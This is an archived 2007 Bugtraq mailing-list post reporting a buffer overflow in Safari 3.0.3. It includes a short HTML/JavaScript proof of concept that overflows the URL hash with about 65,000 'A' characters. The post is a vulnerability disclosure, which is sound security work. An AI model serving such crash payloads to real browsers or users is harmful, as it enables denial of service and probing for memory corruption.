lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 7 Sep 2007 16:28:06 -0000
From: azizov@...efence.ru
To: bugtraq@...urityfocus.com
Subject: Safari 3.0.3 (522.15.5)  Buffer overflow

Azizov E. (azizov@...efence.ru)

1. At processing of data, which has more than 65474 bytes in size, occurs buffer overflow.

POC:

<html>
<body>
<script>
var maxbuf = 65474;

buff = "A";
for (i=0;i<maxbuf;i++) { buff = buff+"A"; }
document.location.hash = buff+"BOW! ";
alert(document.location.hash);
</script>
</body>
</html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ